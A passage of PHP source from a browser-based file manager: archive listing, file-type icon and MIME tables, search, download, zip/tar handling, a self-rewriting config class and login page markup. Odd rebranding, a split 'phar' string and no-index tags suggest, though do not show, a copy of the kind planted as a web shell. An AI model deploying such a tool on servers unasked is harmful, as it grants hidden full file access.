    if ($ext == 'zip' and function_exists('zip_open')) {
        $arch = @zip_open($path);
        if ($arch) {
            $filenames = array();
            while ($zip_entry = @zip_read($arch)) {
                $zip_name = @zip_entry_name($zip_entry);
                $zip_folder = substr($zip_name, -1) == '/';
                $filenames[] = array(
                    'name' => $zip_name,
                    'filesize' => @zip_entry_filesize($zip_entry),
                    'compressed_size' => @zip_entry_compressedsize($zip_entry),
                    'folder' => $zip_folder
                );
            }
            @zip_close($arch);
            return $filenames;
        }
    } elseif($ext == 'tar' and class_exists('PharData')) {
        $archive = new PharData($path);
        $filenames = array();
        foreach(new RecursiveIteratorIterator($archive) as $file) {
            $parent_info = $file->getPathInfo();
            $zip_name = str_replace("ph" . "ar://".$path, '', $file->getPathName());
            $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0);
            $zip_folder = $parent_info->getFileName();
            $zip_info = new SplFileInfo($file);
            $filenames[] = array(
                'name' => $zip_name,
                'filesize' => $zip_info->getSize(),
                'compressed_size' => $file->getCompressedSize(),
                'folder' => $zip_folder
            );
        }
        return $filenames;
    }
    return false;
}


function fanco($text)
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

function fm_isvalid_filename($text) {
    return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false;
}


function fm_set_msg($msg, $status = 'ok')
{
    $_SESSION[DN_CESSION_ID]['message'] = $msg;
    $_SESSION[DN_CESSION_ID]['status'] = $status;
}


function fm_is_utf8($string)
{
    return preg_match('//u', $string);
}


function fm_convert_win($filename)
{
    if (FM_IS_WIN and function_exists('iconv')) {
        $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename);
    }
    return $filename;
}


function fm_object_to_array($obj)
{
    if (!is_object($obj) and !is_array($obj)) {
        return $obj;
    }
    if (is_object($obj)) {
        $obj = get_object_vars($obj);
    }
    return array_map('fm_object_to_array', $obj);
}


function fm_get_file_icon_class($path)
{
    // get extension
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));

    switch ($ext) {
        case 'ico':
        case 'gif':
        case 'jpg':
        case 'jpeg':
        case 'jpc':
        case 'jp2':
        case 'jpx':
        case 'xbm':
        case 'wbmp':
        case 'png':
        case 'bmp':
        case 'tif':
        case 'tiff':
        case 'webp':
        case 'avif':
        case 'svg':
            $img = 'fa fa-picture-o';
            break;
        case 'passwd':
        case 'ftpquota':
        case 'sql':
        case 'js':
        case 'ts':
        case 'jsx':
        case 'tsx':
        case 'hbs':
        case 'json':
        case 'sh':
        case 'config':
        case 'twig':
        case 'tpl':
        case 'md':
        case 'gitignore':
        case 'c':
        case 'cpp':
        case 'cs':
        case 'py':
        case 'rs':
        case 'map':
        case 'lock':
        case 'dtd':
            $img = 'fa fa-file-code-o';
            break;
        case 'txt':
        case 'ini':
        case 'conf':
        case 'log':
        case 'htaccess':
        case 'yaml':
        case 'yml':
        case 'toml':
        case 'tmp':
        case 'top':
        case 'bot':
        case 'dat':
        case 'bak':
        case 'htpasswd':
        case 'pl':
            $img = 'fa fa-file-text-o';
            break;
        case 'css':
        case 'less':
        case 'sass':
        case 'scss':
            $img = 'fa fa-css3';
            break;
        case 'bz2':
        case 'tbz2':
        case 'tbz':
        case 'zip':
        case 'rar':
        case 'gz':
        case 'tgz':
        case 'tar':
        case '7z':
        case 'xz':
        case 'txz':
        case 'zst':
        case 'tzst':
            $img = 'fa fa-file-archive-o';
            break;
        case 'php':
        case 'php4':
        case 'php5':
        case 'phps':
        case 'phtml':
            $img = 'fa fa-code';
            break;
        case 'htm':
        case 'html':
        case 'shtml':
        case 'xhtml':
            $img = 'fa fa-html5';
            break;
        case 'xml':
        case 'xsl':
            $img = 'fa fa-file-excel-o';
            break;
        case 'wav':
        case 'mp3':
        case 'mp2':
        case 'm4a':
        case 'aac':
        case 'ogg':
        case 'oga':
        case 'wma':
        case 'mka':
        case 'flac':
        case 'ac3':
        case 'tds':
            $img = 'fa fa-music';
            break;
        case 'm3u':
        case 'm3u8':
        case 'pls':
        case 'cue':
        case 'xspf':
            $img = 'fa fa-headphones';
            break;
        case 'avi':
        case 'mpg':
        case 'mpeg':
        case 'mp4':
        case 'm4v':
        case 'flv':
        case 'f4v':
        case 'ogm':
        case 'ogv':
        case 'mov':
        case 'mkv':
        case '3gp':
        case 'asf':
        case 'wmv':
        case 'webm':
            $img = 'fa fa-file-video-o';
            break;
        case 'eml':
        case 'msg':
            $img = 'fa fa-envelope-o';
            break;
        case 'xls':
        case 'xlsx':
        case 'ods':
            $img = 'fa fa-file-excel-o';
            break;
        case 'csv':
            $img = 'fa fa-file-text-o';
            break;
        case 'bak':
        case 'swp':
            $img = 'fa fa-clipboard';
            break;
        case 'doc':
        case 'docx':
        case 'odt':
            $img = 'fa fa-file-word-o';
            break;
        case 'ppt':
        case 'pptx':
            $img = 'fa fa-file-powerpoint-o';
            break;
        case 'ttf':
        case 'ttc':
        case 'otf':
        case 'woff':
        case 'woff2':
        case 'eot':
        case 'fon':
            $img = 'fa fa-font';
            break;
        case 'pdf':
            $img = 'fa fa-file-pdf-o';
            break;
        case 'psd':
        case 'ai':
        case 'eps':
        case 'fla':
        case 'swf':
            $img = 'fa fa-file-image-o';
            break;
        case 'exe':
        case 'msi':
            $img = 'fa fa-file-o';
            break;
        case 'bat':
            $img = 'fa fa-terminal';
            break;
        default:
            $img = 'fa fa-info-circle';
    }

    return $img;
}


function fm_get_image_exts()
{
    return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif');
}


function fm_get_video_exts()
{
    return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv');
}


function fm_get_audio_exts()
{
    return array('wav', 'mp3', 'ogg', 'm4a');
}


function fm_get_text_exts()
{
    return array(
        'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config',
        'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue',
        'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift',
        'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml',
        'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars',
        'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl'
    );
}


function fm_get_text_mimes()
{
    return array(
        'application/xml',
        'application/javascript',
        'application/x-javascript',
        'image/svg+xml',
        'message/rfc822',
        'application/json',
    );
}


function fm_get_text_names()
{
    return array(
        'license',
        'readme',
        'authors',
        'contributors',
        'changelog',
    );
}


function fm_get_onlineViewer_exts()
{
    return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods');
}

function fm_get_file_mimes($extension)
{
    $fileTypes['swf'] = 'application/x-shockwave-flash';
    $fileTypes['pdf'] = 'application/pdf';
    $fileTypes['exe'] = 'application/octet-stream';
    $fileTypes['zip'] = 'application/zip';
    $fileTypes['doc'] = 'application/msword';
    $fileTypes['xls'] = 'application/vnd.ms-excel';
    $fileTypes['ppt'] = 'application/vnd.ms-powerpoint';
    $fileTypes['gif'] = 'image/gif';
    $fileTypes['png'] = 'image/png';
    $fileTypes['jpeg'] = 'image/jpg';
    $fileTypes['jpg'] = 'image/jpg';
    $fileTypes['webp'] = 'image/webp';
    $fileTypes['avif'] = 'image/avif';
    $fileTypes['rar'] = 'application/rar';

    $fileTypes['ra'] = 'audio/x-pn-realaudio';
    $fileTypes['ram'] = 'audio/x-pn-realaudio';
    $fileTypes['ogg'] = 'audio/x-pn-realaudio';

    $fileTypes['wav'] = 'video/x-msvideo';
    $fileTypes['wmv'] = 'video/x-msvideo';
    $fileTypes['avi'] = 'video/x-msvideo';
    $fileTypes['asf'] = 'video/x-msvideo';
    $fileTypes['divx'] = 'video/x-msvideo';

    $fileTypes['mp3'] = 'audio/mpeg';
    $fileTypes['mp4'] = 'audio/mpeg';
    $fileTypes['mpeg'] = 'video/mpeg';
    $fileTypes['mpg'] = 'video/mpeg';
    $fileTypes['mpe'] = 'video/mpeg';
    $fileTypes['mov'] = 'video/quicktime';
    $fileTypes['swf'] = 'video/quicktime';
    $fileTypes['3gp'] = 'video/quicktime';
    $fileTypes['m4a'] = 'video/quicktime';
    $fileTypes['aac'] = 'video/quicktime';
    $fileTypes['m3u'] = 'video/quicktime';

    $fileTypes['php'] = ['application/x-php'];
    $fileTypes['html'] = ['text/html'];
    $fileTypes['txt'] = ['text/plain'];
    //Unknown mime-types should be 'application/octet-stream'
    if(empty($fileTypes[$extension])) {
      $fileTypes[$extension] = ['application/octet-stream'];
    }
    return $fileTypes[$extension];
}


 function scan($dir = '', $filter = '') {
    $path = FM_ROOT_PATH.'/'.$dir;
     if($path) {
         $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path));
         $rii = new RegexIterator($ite, "/(" . $filter . ")/i");

         $files = array();
         foreach ($rii as $file) {
             if (!$file->isDir()) {
                 $fileName = $file->getFilename();
                 $location = str_replace(FM_ROOT_PATH, '', $file->getPath());
                 $files[] = array(
                     "name" => $fileName,
                     "type" => "file",
                     "path" => $location,
                 );
             }
         }
         return $files;
     }
}


function fm_download_file($fileLocation, $fileName, $chunkSize  = 1024)
{
    if (connection_status() != 0)
        return (false);
    $extension = pathinfo($fileName, PATHINFO_EXTENSION);

    $contentType = fm_get_file_mimes($extension);

    $size = filesize($fileLocation);

    if ($size == 0) {
        fm_set_msg(lng('Zero byte file! Aborting download'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));

        return (false);
    }

    @ini_set('magic_quotes_runtime', 0);
    $fp = fopen("$fileLocation", "rb");

    if ($fp === false) {
        fm_set_msg(lng('Cannot open file! Aborting download'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
        return (false);
    }

    // headers
    header('Content-Description: File Transfer');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header("Content-Transfer-Encoding: binary");
    header("Content-Type: $contentType");

    $contentDisposition = 'attachment';

    if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) {
        $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1);
        header("Content-Disposition: $contentDisposition;filename=\"$fileName\"");
    } else {
        header("Content-Disposition: $contentDisposition;filename=\"$fileName\"");
    }

    header("Accept-Ranges: bytes");
    $range = 0;

    if (isset($_SERVER['HTTP_RANGE'])) {
        list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']);
        str_replace($range, "-", $range);
        $size2 = $size - 1;
        $new_length = $size - $range;
        header("HTTP/1.1 206 Partial Content");
        header("Content-Length: $new_length");
        header("Content-Range: bytes $range$size2/$size");
    } else {
        $size2 = $size - 1;
        header("Content-Range: bytes 0-$size2/$size");
        header("Content-Length: " . $size);
    }
    $fileLocation = realpath($fileLocation);
    while (ob_get_level()) ob_end_clean();
    readfile($fileLocation);

    fclose($fp);

    return ((connection_status() == 0) and !connection_aborted());
}

function fm_get_theme() {
    $result = '';
    if(FM_THEME == "dark") {
        $result = "text-white bg-dark";
    }
    return $result;
}

class FM_Zipper
{
    private $zip;

    public function __construct()
    {
        $this->zip = new ZipArchive();
    }

    public function create($filename, $files)
    {
        $res = $this->zip->open($filename, ZipArchive::CREATE);
        if ($res !== true) {
            return false;
        }
        if (is_array($files)) {
            foreach ($files as $f) {
                $f = fm_clean_path($f);
                if (!$this->addFileOrDir($f)) {
                    $this->zip->close();
                    return false;
                }
            }
            $this->zip->close();
            return true;
        } else {
            if ($this->addFileOrDir($files)) {
                $this->zip->close();
                return true;
            }
            return false;
        }
    }


    public function unzip($filename, $path)
    {
        $res = $this->zip->open($filename);
        if ($res !== true) {
            return false;
        }
        if ($this->zip->extractTo($path)) {
            $this->zip->close();
            return true;
        }
        return false;
    }


    private function addFileOrDir($filename)
    {
        if (is_file($filename)) {
            return $this->zip->addFile($filename);
        } elseif (is_dir($filename)) {
            return $this->addDir($filename);
        }
        return false;
    }


    private function addDir($path)
    {
        if (!$this->zip->addEmptyDir($path)) {
            return false;
        }
        $objects = scandir($path);
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (is_dir($path . '/' . $file)) {
                        if (!$this->addDir($path . '/' . $file)) {
                            return false;
                        }
                    } elseif (is_file($path . '/' . $file)) {
                        if (!$this->zip->addFile($path . '/' . $file)) {
                            return false;
                        }
                    }
                }
            }
            return true;
        }
        return false;
    }
}


class FM_Zipper_Tar
{
    private $tar;

    public function __construct()
    {
        $this->tar = null;
    }


    public function create($filename, $files)
    {
        $this->tar = new PharData($filename);
        if (is_array($files)) {
            foreach ($files as $f) {
                $f = fm_clean_path($f);
                if (!$this->addFileOrDir($f)) {
                    return false;
                }
            }
            return true;
        } else {
            if ($this->addFileOrDir($files)) {
                return true;
            }
            return false;
        }
    }


    public function unzip($filename, $path)
    {
        $res = $this->tar->open($filename);
        if ($res !== true) {
            return false;
        }
        if ($this->tar->extractTo($path)) {
            return true;
        }
        return false;
    }

    /**
     * Add file/folder to archive
     * @param string $filename
     * @return bool
     */
    private function addFileOrDir($filename)
    {
        if (is_file($filename)) {
            try {
                $this->tar->addFile($filename);
                return true;
            } catch (Exception $e) {
                return false;
            }
        } elseif (is_dir($filename)) {
            return $this->addDir($filename);
        }
        return false;
    }


    private function addDir($path)
    {
        $objects = scandir($path);
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (is_dir($path . '/' . $file)) {
                        if (!$this->addDir($path . '/' . $file)) {
                            return false;
                        }
                    } elseif (is_file($path . '/' . $file)) {
                        try {
                            $this->tar->addFile($path . '/' . $file);
                        } catch (Exception $e) {
                            return false;
                        }
                    }
                }
            }
            return true;
        }
        return false;
    }
}


 class FM_Config
{
     var $data;

    function __construct()
    {
        global $root_path, $root_url, $CONFIG;
        $fm_url = $root_url.$_SERVER["PHP_SELF"];
        $this->data = array(
            'lang' => 'en',
            'error_reporting' => true,
            'show_hidden' => true
        );
        $data = false;
        if (strlen($CONFIG)) {
            $data = fm_object_to_array(json_decode($CONFIG));
        } else {
            $msg = 'peripherad<br>Error: Cannot load configuration';
            if (substr($fm_url, -1) == '/') {
                $fm_url = rtrim($fm_url, '/');
                $msg .= '<br>';
                $msg .= '<br>Seems like you have a trailing slash on the URL.';
                $msg .= '<br>Try this link: <a href="' . $fm_url . '">' . $fm_url . '</a>';
            }
            die($msg);
        }
        if (is_array($data) and count($data)) $this->data = $data;
        else $this->save();
    }

    function save()
    {
        $fm_file = __FILE__;
        $var_name = '$CONFIG';
        $var_value = var_export(json_encode($this->data), true);
        $config_string = "<?php" . chr(13) . chr(10) . "//Default Configuration".chr(13) . chr(10)."$var_name = $var_value;" . chr(13) . chr(10);
        if (is_writable($fm_file)) {
            $lines = file($fm_file);
            if ($fh = @fopen($fm_file, "w")) {
                @fputs($fh, $config_string, strlen($config_string));
                for ($x = 3; $x < count($lines); $x++) {
                    @fputs($fh, $lines[$x], strlen($lines[$x]));
                }
                @fclose($fh);
            }
        }
    }
}


function fm_show_nav_path($path)
{
    global $lang, $sticky_navbar, $editFile;
    $isStickyNavBar = $sticky_navbar ? 'fixed-top' : '';
    $getTheme = fm_get_theme();
    $getTheme .= " navbar-light";
    if(FM_THEME == "dark") {
        $getTheme .= " navbar-dark";
    } else {
        $getTheme .= " bg-white";
    }
    ?>
    <nav class="navbar navbar-expand-lg <?php echo $getTheme; ?> mb-4 main-nav <?php echo $isStickyNavBar ?>">
        <a class="navbar-brand"> <?php echo lng('AppTitle') ?> </a>
        <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarSupportedContent">

            <?php
            $path = fm_clean_path($path);
            $root_url = "<a href='?p='><i class='fa fa-home' aria-hidden='true' title='" . FM_ROOT_PATH . "'></i></a>";
            $sep = '<i class="bread-crumb"> / </i>';
            if ($path != '') {
                $exploded = explode('/', $path);
                $count = count($exploded);
                $array = array();
                $parent = '';
                for ($i = 0; $i < $count; $i++) {
                    $parent = trim($parent . '/' . $exploded[$i], '/');
                    $parent_enc = urlencode($parent);
                    $array[] = "<a href='?p={$parent_enc}'>" . fanco(fm_convert_win($exploded[$i])) . "</a>";
                }
                $root_url .= $sep . implode($sep, $array);
            }
            echo '<div class="col-xs-6 col-sm-5">' . $root_url . $editFile . '</div>';
            ?>

            <div class="col-xs-6 col-sm-7">
                <ul class="navbar-nav justify-content-end <?php echo fm_get_theme();  ?>">
                    <li class="nav-item mr-2">
                        <div class="input-group input-group-sm mr-1" style="margin-top:4px;">
                            <input type="text" class="form-control" placeholder="<?php echo lng('Search') ?>" aria-label="<?php echo lng('Search') ?>" aria-describedby="search-addon2" id="search-addon">
                            <div class="input-group-append">
                                <span class="input-group-text brl-0 brr-0" id="search-addon2"><i class="fa fa-search"></i></span>
                            </div>
                            <div class="input-group-append btn-group">
                                <span class="input-group-text dropdown-toggle brl-0" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"></span>
                                  <div class="dropdown-menu dropdown-menu-right">
                                    <a class="dropdown-item" href="<?php echo $path2 = $path ? $path : '.'; ?>" id="js-search-modal" data-bs-toggle="modal" data-bs-target="#searchModal"><?php echo lng('Advanced Search') ?></a>
                                  </div>
                            </div>
                        </div>
                    </li>
                    <?php if (!FM_READONLY): ?>
                    <li class="nav-item">
                        <a title="<?php echo lng('Upload') ?>" class="nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;upload"><i class="fa fa-cloud-upload" aria-hidden="true"></i> <?php echo lng('Upload') ?></a>
                    </li>
                    <li class="nav-item">
                        <a title="<?php echo lng('NewItem') ?>" class="nav-link" href="#createNewItem" data-bs-toggle="modal" data-bs-target="#createNewItem"><i class="fa fa-plus-square"></i> <?php echo lng('NewItem') ?></a>
                    </li>
                    <?php endif; ?>
                    <?php if (FM_USE_AUTH): ?>
                    <li class="nav-item avatar dropdown">
                        <a class="nav-link dropdown-toggle" id="navbarDropdownMenuLink-5" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <i class="fa fa-user-circle"></i> <?php if(isset($_SESSION[DN_CESSION_ID]['logged'])) { echo $_SESSION[DN_CESSION_ID]['logged']; } ?></a>
                        <div class="dropdown-menu text-small shadow <?php echo fm_get_theme(); ?>" aria-labelledby="navbarDropdownMenuLink-5">
                            <?php if (!FM_READONLY): ?>
                            <a title="<?php echo lng('Settings') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;settings=1"><i class="fa fa-cog" aria-hidden="true"></i> <?php echo lng('Settings') ?></a>
                            <?php endif ?>
                            <a title="<?php echo lng('Help') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;help=2"><i class="fa fa-exclamation-circle" aria-hidden="true"></i> <?php echo lng('Help') ?></a>
                            <a title="<?php echo lng('Logout') ?>" class="dropdown-item nav-link" href="?logout=1"><i class="fa fa-sign-out" aria-hidden="true"></i> <?php echo lng('Logout') ?></a>
                        </div>
                    </li>
                    <?php else: ?>
                        <?php if (!FM_READONLY): ?>
                            <li class="nav-item">
                                <a title="<?php echo lng('Settings') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;settings=1"><i class="fa fa-cog" aria-hidden="true"></i> <?php echo lng('Settings') ?></a>
                            </li>
                        <?php endif; ?>
                    <?php endif; ?>
                </ul>
            </div>
        </div>
    </nav>
    <?php
}


function fm_show_message()
{
    if (isset($_SESSION[DN_CESSION_ID]['message'])) {
        $class = isset($_SESSION[DN_CESSION_ID]['status']) ? $_SESSION[DN_CESSION_ID]['status'] : 'ok';
        echo '<p class="message ' . $class . '">' . $_SESSION[DN_CESSION_ID]['message'] . '</p>';
        unset($_SESSION[DN_CESSION_ID]['message']);
        unset($_SESSION[DN_CESSION_ID]['status']);
    }
}


function fm_show_header_login()
{
$sprites_ver = '20160315';
header("Content-Type: text/html; charset=utf-8");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");

global $lang, $root_url, $favicon_path;
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="peripherad">
    <meta name="author" content="CCP Programmers">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex">
    <?php if($favicon_path) { echo '<link rel="icon" href="'.fanco($favicon_path).'" type="image/png">'; } ?>
    <title><?php echo fanco(APP_TITLE) ?></title>
    <?php print_external('pre-jsdelivr'); ?>
    <?php print_external('css-bootstrap'); ?>
    <style>
        body.fm-login-page{ background-color:#f7f9fb;font-size:14px;background-color:#f7f9fb;background-image:url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 304 304' width='304' height='304'%3E%3Cpath fill='%23e2e9f1' fill-opacity='0.4' d='M44.1 224a5 5 0 1 1 0 2H0v-2h44.1zm160 48a5 5 0 1 1 0 2H82v-2h122.1zm57.8-46a5 5 0 1 1 0-2H304v2h-42.1zm0 16a5 5 0 1 1 0-2H304v2h-42.1zm6.2-114a5 5 0 1 1 0 2h-86.2a5 5 0 1 1 0-2h86.2zm-256-48a5 5 0 1 1 0 2H0v-2h12.1zm185.8 34a5 5 0 1 1 0-2h86.2a5 5 0 1 1 0 2h-86.2zM258 12.1a5 5 0 1 1-2 0V0h2v12.1zm-64 208a5 5 0 1 1-2 0v-54.2a5 5 0 1 1 2 0v54.2zm48-198.2V80h62v2h-64V21.9a5 5 0 1 1 2 0zm16 16V64h46v2h-48V37.9a5 5 0 1 1 2 0zm-128 96V208h16v12.1a5 5 0 1 1-2 0V210h-16v-76.1a5 5 0 1 1 2 0zm-5.9-21.9a5 5 0 1 1 0 2H114v48H85.9a5 5 0 1 1 0-2H112v-48h12.1zm-6.2 130a5 5 0 1 1 0-2H176v-74.1a5 5 0 1 1 2 0V242h-60.1zm-16-64a5 5 0 1 1 0-2H114v48h10.1a5 5 0 1 1 0 2H112v-48h-10.1zM66 284.1a5 5 0 1 1-2 0V274H50v30h-2v-32h18v12.1zM236.1 176a5 5 0 1 1 0 2H226v94h48v32h-2v-30h-48v-98h12.1zm25.8-30a5 5 0 1 1 0-2H274v44.1a5 5 0 1 1-2 0V146h-10.1zm-64 96a5 5 0 1 1 0-2H208v-80h16v-14h-42.1a5 5 0 1 1 0-2H226v18h-16v80h-12.1zm86.2-210a5 5 0 1 1 0 2H272V0h2v32h10.1zM98 101.9V146H53.9a5 5 0 1 1 0-2H96v-42.1a5 5 0 1 1 2 0zM53.9 34a5 5 0 1 1 0-2H80V0h2v34H53.9zm60.1 3.9V66H82v64H69.9a5 5 0 1 1 0-2H80V64h32V37.9a5 5 0 1 1 2 0zM101.9 82a5 5 0 1 1 0-2H128V37.9a5 5 0 1 1 2 0V82h-28.1zm16-64a5 5 0 1 1 0-2H146v44.1a5 5 0 1 1-2 0V18h-26.1zm102.2 270a5 5 0 1 1 0 2H98v14h-2v-16h124.1zM242 149.9V160h16v34h-16v62h48v48h-2v-46h-48v-66h16v-30h-16v-12.1a5 5 0 1 1 2 0zM53.9 18a5 5 0 1 1 0-2H64V2H48V0h18v18H53.9zm112 32a5 5 0 1 1 0-2H192V0h50v2h-48v48h-28.1zm-48-48a5 5 0 0 1-9.8-2h2.07a3 3 0 1 0 5.66 0H178v34h-18V21.9a5 5 0 1 1 2 0V32h14V2h-58.1zm0 96a5 5 0 1 1 0-2H137l32-32h39V21.9a5 5 0 1 1 2 0V66h-40.17l-32 32H117.9zm28.1 90.1a5 5 0 1 1-2 0v-76.51L175.59 80H224V21.9a5 5 0 1 1 2 0V82h-49.59L146 112.41v75.69zm16 32a5 5 0 1 1-2 0v-99.51L184.59 96H300.1a5 5 0 0 1 3.9-3.9v2.07a3 3 0 0 0 0 5.66v2.07a5 5 0 0 1-3.9-3.9H185.41L162 121.41v98.69zm-144-64a5 5 0 1 1-2 0v-3.51l48-48V48h32V0h2v50H66v55.41l-48 48v2.69zM50 53.9v43.51l-48 48V208h26.1a5 5 0 1 1 0 2H0v-65.41l48-48V53.9a5 5 0 1 1 2 0zm-16 16V89.41l-34 34v-2.82l32-32V69.9a5 5 0 1 1 2 0zM12.1 32a5 5 0 1 1 0 2H9.41L0 43.41V40.6L8.59 32h3.51zm265.8 18a5 5 0 1 1 0-2h18.69l7.41-7.41v2.82L297.41 50H277.9zm-16 160a5 5 0 1 1 0-2H288v-71.41l16-16v2.82l-14 14V210h-28.1zm-208 32a5 5 0 1 1 0-2H64v-22.59L40.59 194H21.9a5 5 0 1 1 0-2H41.41L66 216.59V242H53.9zm150.2 14a5 5 0 1 1 0 2H96v-56.6L56.6 162H37.9a5 5 0 1 1 0-2h19.5L98 200.6V256h106.1zm-150.2 2a5 5 0 1 1 0-2H80v-46.59L48.59 178H21.9a5 5 0 1 1 0-2H49.41L82 208.59V258H53.9zM34 39.8v1.61L9.41 66H0v-2h8.59L32 40.59V0h2v39.8zM2 300.1a5 5 0 0 1 3.9 3.9H3.83A3 3 0 0 0 0 302.17V256h18v48h-2v-46H2v42.1zM34 241v63h-2v-62H0v-2h34v1zM17 18H0v-2h16V0h2v18h-1zm273-2h14v2h-16V0h2v16zm-32 273v15h-2v-14h-14v14h-2v-16h18v1zM0 92.1A5.02 5.02 0 0 1 6 97a5 5 0 0 1-6 4.9v-2.07a3 3 0 1 0 0-5.66V92.1zM80 272h2v32h-2v-32zm37.9 32h-2.07a3 3 0 0 0-5.66 0h-2.07a5 5 0 0 1 9.8 0zM5.9 0A5.02 5.02 0 0 1 0 5.9V3.83A3 3 0 0 0 3.83 0H5.9zm294.2 0h2.07A3 3 0 0 0 304 3.83V5.9a5 5 0 0 1-3.9-5.9zm3.9 300.1v2.07a3 3 0 0 0-1.83 1.83h-2.07a5 5 0 0 1 3.9-3.9zM97 100a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-48 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 96a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-144a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM49 36a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM33 68a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 240a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 